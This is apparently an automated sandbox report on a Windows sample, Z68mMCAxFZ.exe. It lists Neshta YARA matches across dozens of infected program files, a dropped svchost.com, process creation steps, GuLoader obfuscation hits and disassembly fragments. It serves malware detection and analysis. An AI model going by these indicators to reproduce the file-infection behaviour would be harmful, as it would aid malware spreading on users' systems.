                  Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Windows\svchost.com, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | File created: C:\Windows\svchost.com
                  Source: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe | Process Stats: CPU usage > 98%
                  Source: Z68mMCAxFZ.exe, 00000000.00000003.672068638.0000000002237000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUndladendekand7.exe vs Z68mMCAxFZ.exe
                  Source: Z68mMCAxFZ.exe, 00000000.00000002.939439057.0000000000190000.00000004.00000001.sdmp | Binary or memory string: OriginalFilename vs Z68mMCAxFZ.exe
                  Source: Z68mMCAxFZ.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Joe Sandbox View | Dropped File: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe 8FCB4C541BDDA7D5CDA8124B48BECBAFBAFE2D82116BD6356D16FF894E1D83AD
                  Source: Z68mMCAxFZ.exe | Virustotal: Detection: 85%
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | File read: C:\Users\user\Desktop\Z68mMCAxFZ.exe
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
                  Source: unknown | Process created: C:\Users\user\Desktop\Z68mMCAxFZ.exe 'C:\Users\user\Desktop\Z68mMCAxFZ.exe'
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Process created: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe 'C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe'
                  Source: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe | Process created: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe 'C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe'
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | File created: C:\Users\user\AppData\Local\Temp\3582-490
                  Source: classification engine | Classification label: mal100.rans.spre.troj.evad.winEXE@5/111@0/0
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | File read: C:\Users\user\Desktop\desktop.ini

                  Data Obfuscation:

                  Yara detected GuLoader
                  Source: Yara match | File source: 0000000F.00000002.938917460.0000000000560000.00000040.00000001.sdmp, type: MEMORY
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_0040802C push 00408052h; ret 0_2_0040804A
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_004070A4 push 004070D0h; ret 0_2_004070C8
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_004041D8 push 00404204h; ret 0_2_004041FC
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_004041A0 push 004041CCh; ret 0_2_004041C4
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_00404256 push 00404284h; ret 0_2_0040427C
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_00404258 push 00404284h; ret 0_2_0040427C
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_00404210 push 0040423Ch; ret 0_2_00404234
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_004042C8 push 004042F4h; ret 0_2_004042EC
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_00404290 push 004042BCh; ret 0_2_004042B4
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_00404370 push 0040439Ch; ret 0_2_00404394
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_00404300 push 0040432Ch; ret 0_2_00404324
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_00404338 push 00404364h; ret 0_2_0040435C
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_004043E0 push 0040440Ch; ret 0_2_00404404
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_004043A8 push 004043D4h; ret 0_2_004043CC
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_00410778 push 00406D36h; ret 0_2_004107C6
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_0040D7C0 push 00403D79h; ret 0_2_0040D809
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_0040D9F0 push 00403F84h; ret 0_2_0040DA14
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_0040DA28 push 00403FBCh; ret 0_2_0040DA4C
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_00411AC4 push 00408052h; ret 0_2_00411AE2
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_00410B3C push 004070D0h; ret 0_2_00410B60
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_0040DC70 push 00404204h; ret 0_2_0040DC94
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_0040DC38 push 004041CCh; ret 0_2_0040DC5C
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_00406CE0 push 00406D36h; ret 0_2_00406D2E
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_0040DCEE push 00404284h; ret 0_2_0040DD14
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_0040DCF0 push 00404284h; ret 0_2_0040DD14
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_0040DCA8 push 0040423Ch; ret 0_2_0040DCCC
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_0040DD60 push 004042F4h; ret 0_2_0040DD84
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_00403D28 push 00403D79h; ret 0_2_00403D71
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_0040DD28 push 004042BCh; ret 0_2_0040DD4C
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_0040DDD0 push 00404364h; ret 0_2_0040DDF4
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_0040DD98 push 0040432Ch; ret 0_2_0040DDBC

                  Persistence and Installation Behavior:

                  Yara detected Neshta
                  Source: Yara match | File source: Z68mMCAxFZ.exe, type: SAMPLE
                  Source: Yara match | File source: 0.0.Z68mMCAxFZ.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.Z68mMCAxFZ.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: Z68mMCAxFZ.exe PID: 6284, type: MEMORYSTR
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, type: DROPPED
